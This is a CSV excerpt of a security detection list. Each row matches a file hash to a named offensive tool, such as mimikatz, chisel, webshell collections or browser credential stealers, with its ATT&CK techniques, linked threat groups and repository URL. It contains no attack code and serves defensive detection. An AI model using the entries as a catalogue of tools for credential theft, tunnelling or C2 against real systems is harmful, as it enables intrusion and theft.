"*a7cc4efa0b13e199acd6d09b696b7d2ff0cff7aefd420ef9e87a216a396b1e9d*",".{0,1000}a7cc4efa0b13e199acd6d09b696b7d2ff0cff7aefd420ef9e87a216a396b1e9d.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","32713"
"*a7d587bc5790f34766ae32da9825e585fea77ba0b3f9ab6a3b690959ab6f2386*",".{0,1000}a7d587bc5790f34766ae32da9825e585fea77ba0b3f9ab6a3b690959ab6f2386.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32714"
"*a7de9b97cf6299048be115fdb123c1205b51a850b40c0bb79fb2b5ebad319d6b*",".{0,1000}a7de9b97cf6299048be115fdb123c1205b51a850b40c0bb79fb2b5ebad319d6b.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/","1","0","#filehash","webshell used with proxylogon exploitation","10","10","N/A","N/A","N/A","N/A","32716"
"*a7e469379e562140126522b28d4c00c3ad88fb323ec6d58f3794a76b65e81c67*",".{0,1000}a7e469379e562140126522b28d4c00c3ad88fb323ec6d58f3794a76b65e81c67.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","32718"
"*a7e8aade00d2cd5aeb6ec40d5b64f6cac88f120efb4efb719567e758af5892c2*",".{0,1000}a7e8aade00d2cd5aeb6ec40d5b64f6cac88f120efb4efb719567e758af5892c2.{0,1000}","offensive_tool_keyword","go-lsass","dumping LSASS process remotely","T1003 - T1055 - T1021.005","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/jfjallid/go-lsass","1","0","#filehash","N/A","9","1","38","5","2024-07-27T10:35:12Z","2023-11-30T18:45:51Z","32720"
"*a7e9bf156061f6312c826da68a6a0fa9ef025cde57808bec004065ff2fc108db*",".{0,1000}a7e9bf156061f6312c826da68a6a0fa9ef025cde57808bec004065ff2fc108db.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","32721"
"*a7f243d5fa0843494e5d83810d2a4be9469fe02b2d8ced52e61a9355d9e6d697*",".{0,1000}a7f243d5fa0843494e5d83810d2a4be9469fe02b2d8ced52e61a9355d9e6d697.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","32723"
"*a7f5996d248ea178587e34a990457b43a69ada5c4ad1e5586eca9fbcd36668df*",".{0,1000}a7f5996d248ea178587e34a990457b43a69ada5c4ad1e5586eca9fbcd36668df.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","32724"
"*a7f816de8f8e9534649b723d4d61431736966af0d5ccae7ddde2be54755d8ea4*",".{0,1000}a7f816de8f8e9534649b723d4d61431736966af0d5ccae7ddde2be54755d8ea4.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32725"
"*a7fbaa609d657e8148a05586684aa41941b28bb5130b8db24b091cf0d9e2ae79*",".{0,1000}a7fbaa609d657e8148a05586684aa41941b28bb5130b8db24b091cf0d9e2ae79.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32726"
"*a7fcb2adaf096a7aeab2cba92fb1c92091302b2dd18219ee4ec1aedd67383efc*",".{0,1000}a7fcb2adaf096a7aeab2cba92fb1c92091302b2dd18219ee4ec1aedd67383efc.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#filehash","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","32727"
"*a808917e807c51f703c084d74daf008a759a97f7b1719c40e2453a1b71a39a01*",".{0,1000}a808917e807c51f703c084d74daf008a759a97f7b1719c40e2453a1b71a39a01.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","32729"
"*a8107d674c8391e70cf7687976f9973157bcd2458cfb597a22e051c8f62f6f16*",".{0,1000}a8107d674c8391e70cf7687976f9973157bcd2458cfb597a22e051c8f62f6f16.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","32730"
"*a814e455a709e0ee42fdec62b57f9a62cc3af6d31b2f54ff9d869a6736ded903*",".{0,1000}a814e455a709e0ee42fdec62b57f9a62cc3af6d31b2f54ff9d869a6736ded903.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32732"
"*a814e455a709e0ee42fdec62b57f9a62cc3af6d31b2f54ff9d869a6736ded903*",".{0,1000}a814e455a709e0ee42fdec62b57f9a62cc3af6d31b2f54ff9d869a6736ded903.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32733"
"*a829137b318890cb77f6a1ce28ce4dbaa4a39e19ef91b75f4f50dfc2b1a992bf*",".{0,1000}a829137b318890cb77f6a1ce28ce4dbaa4a39e19ef91b75f4f50dfc2b1a992bf.{0,1000}","offensive_tool_keyword","SharpDump","SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.","T1003 - T1055 - T1070","TA0006 - TA0005 - TA0008","N/A","Avaddon","Credential Access","https://github.com/GhostPack/SharpDump","1","0","#filehash","N/A","10","7","664","130","2019-02-07T02:52:20Z","2018-07-24T17:42:19Z","32737"
"*a82b9a0c081af7c9628d7e2b3b70fbf0e1aa89c3cfc2778c177aae45cb394d71*",".{0,1000}a82b9a0c081af7c9628d7e2b3b70fbf0e1aa89c3cfc2778c177aae45cb394d71.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32738"
"*a82ec4a7feac8a7bcab876286599e1df136c93ac470ba634fa77be156ee40615*",".{0,1000}a82ec4a7feac8a7bcab876286599e1df136c93ac470ba634fa77be156ee40615.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/engineseller/localtonet","1","0","#filehash","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","32739"
"*a8326d0a60d9ea4574fe34d5d65d220b85bfd294ebb8c7228c17c75df71182e9*",".{0,1000}a8326d0a60d9ea4574fe34d5d65d220b85bfd294ebb8c7228c17c75df71182e9.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","32740"
"*a834a0a0c5e0d0ef14de2e986b53b032747f52071815957e42633495fb7bc42f*",".{0,1000}a834a0a0c5e0d0ef14de2e986b53b032747f52071815957e42633495fb7bc42f.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","32741"
"*a836426cb1693f3d72b455ae5ff8315993ea5217047bfca288b56554d717f632*",".{0,1000}a836426cb1693f3d72b455ae5ff8315993ea5217047bfca288b56554d717f632.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","32742"
"*a839c3f26cc75bf3ebc5c8adf91582390c0e625d9c9da30949d968451c6d03dd*",".{0,1000}a839c3f26cc75bf3ebc5c8adf91582390c0e625d9c9da30949d968451c6d03dd.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","32744"
"*a83a41e188cc050f6cb63c7a45855f1095b5db1bbbc26a2cc41696f8be8be2d0*",".{0,1000}a83a41e188cc050f6cb63c7a45855f1095b5db1bbbc26a2cc41696f8be8be2d0.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","32745"
"*a83ba2c435fcf714eda4cc84cde9a72c8214157eba585b2debba0f9274af0e8f*",".{0,1000}a83ba2c435fcf714eda4cc84cde9a72c8214157eba585b2debba0f9274af0e8f.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#filehash","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","32746"
"*a83c33f484a2cbff3bbefdf51880714968930f69778e8921d8182d2b96e03314*",".{0,1000}a83c33f484a2cbff3bbefdf51880714968930f69778e8921d8182d2b96e03314.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#filehash","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","32747"
"*a83c33f484a2cbff3bbefdf51880714968930f69778e8921d8182d2b96e03314*",".{0,1000}a83c33f484a2cbff3bbefdf51880714968930f69778e8921d8182d2b96e03314.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","32748"
"*a8421a872b4c4eccc02a0ebb623f9ecc2991e949e4134fc184ca1822da0e5c4c*",".{0,1000}a8421a872b4c4eccc02a0ebb623f9ecc2991e949e4134fc184ca1822da0e5c4c.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","#filehash","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","32749"
"*a8459e2fc93dc20b5277e4f671f612b96b2b79ba16fd31b8e98e847cd7f3e7ee*",".{0,1000}a8459e2fc93dc20b5277e4f671f612b96b2b79ba16fd31b8e98e847cd7f3e7ee.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32750"
"*a845c8128bc9accb902cdeaa85c93cbf41dc83d74ab4c82ffc13f336bee6e666*",".{0,1000}a845c8128bc9accb902cdeaa85c93cbf41dc83d74ab4c82ffc13f336bee6e666.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32751"
"*a84e1abea8327bcede6dfb79b50b36780f2e1cdb8166002d75c070574a83738f*",".{0,1000}a84e1abea8327bcede6dfb79b50b36780f2e1cdb8166002d75c070574a83738f.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","#filehash","N/A","10","2","179","36","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z","32752"
"*a856cacd5a888686b543aaff5e4ca96d47872e3f59ef4b68701a035d5d35486c*",".{0,1000}a856cacd5a888686b543aaff5e4ca96d47872e3f59ef4b68701a035d5d35486c.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","32754"
"*a865ea23efd65afc7ab6222c34a2c6f15f827d8e8458f3e7c2c1b0a513182cf1*",".{0,1000}a865ea23efd65afc7ab6222c34a2c6f15f827d8e8458f3e7c2c1b0a513182cf1.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","#filehash","N/A","10","9","N/A","N/A","N/A","N/A","32757"
"*a870ee7018be0e35ed196a844c194b0c69ade3ec46b8f7895f6e002a73c114d5*",".{0,1000}a870ee7018be0e35ed196a844c194b0c69ade3ec46b8f7895f6e002a73c114d5.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","32758"
"*a87fea89545bb209dcc98edfe23e5171def343793d956308ef1c9b5c1e477990*",".{0,1000}a87fea89545bb209dcc98edfe23e5171def343793d956308ef1c9b5c1e477990.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","32759"
"*a88896071aafd285ea22e4fa7ebcf5037926f0cf5674256a29d31121ddc74013*",".{0,1000}a88896071aafd285ea22e4fa7ebcf5037926f0cf5674256a29d31121ddc74013.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","32761"
"*a88a0af4e583fbae14ad5003c85f29949b720db848e373668924880369fa8fbd*",".{0,1000}a88a0af4e583fbae14ad5003c85f29949b720db848e373668924880369fa8fbd.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","32762"
"*a88f29ebf454ddc490c273365b81093089bb4c9f407546371522c2feaeb446db*",".{0,1000}a88f29ebf454ddc490c273365b81093089bb4c9f407546371522c2feaeb446db.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32764"
"*a891ef1cf80e8b8130414970e811828379518218c14abb4c843f4a4671cd3502*",".{0,1000}a891ef1cf80e8b8130414970e811828379518218c14abb4c843f4a4671cd3502.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32765"
"*a8944d1ff8c72e68ca1bb55dad84aae6cb7d4cbcc92d442dc8497c8949a96adc*",".{0,1000}a8944d1ff8c72e68ca1bb55dad84aae6cb7d4cbcc92d442dc8497c8949a96adc.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","#filehash","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","32767"
"*a89da438ecbe2e8c5f65e2bcbf5d82a84d26ba56dff46eb180c9de213f5a1871*",".{0,1000}a89da438ecbe2e8c5f65e2bcbf5d82a84d26ba56dff46eb180c9de213f5a1871.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","0","#filehash","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","32768"
"*a89e428291b7d4d870e2f24564c86bdaed721131926eeae10602c5b86295466c*",".{0,1000}a89e428291b7d4d870e2f24564c86bdaed721131926eeae10602c5b86295466c.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32769"
"*a8ac4596bab404b9c23d9551f2a2b5922374b7e1ed8b382159f135ffc8bce8f9*",".{0,1000}a8ac4596bab404b9c23d9551f2a2b5922374b7e1ed8b382159f135ffc8bce8f9.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32774"
"*a8bb914637ae760a57ab1ea6f00636348371f4bff4ddae20cc14b533ec6d9e6b*",".{0,1000}a8bb914637ae760a57ab1ea6f00636348371f4bff4ddae20cc14b533ec6d9e6b.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","32775"
"*a8bc3637b6ff70a1ed94a1b39c54aec2c212f8a657c674987bb92312816938ff*",".{0,1000}a8bc3637b6ff70a1ed94a1b39c54aec2c212f8a657c674987bb92312816938ff.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32776"
"*a8c060ee140475c6ff0065e27e2274b37f7c3b9ba433ce2b406710b565ab078a*",".{0,1000}a8c060ee140475c6ff0065e27e2274b37f7c3b9ba433ce2b406710b565ab078a.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","#filehash","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","32777"
"*a8ce36f599c838c95b169252fe56cd412923d8d25f1cf906213d39582299ade7*",".{0,1000}a8ce36f599c838c95b169252fe56cd412923d8d25f1cf906213d39582299ade7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32778"
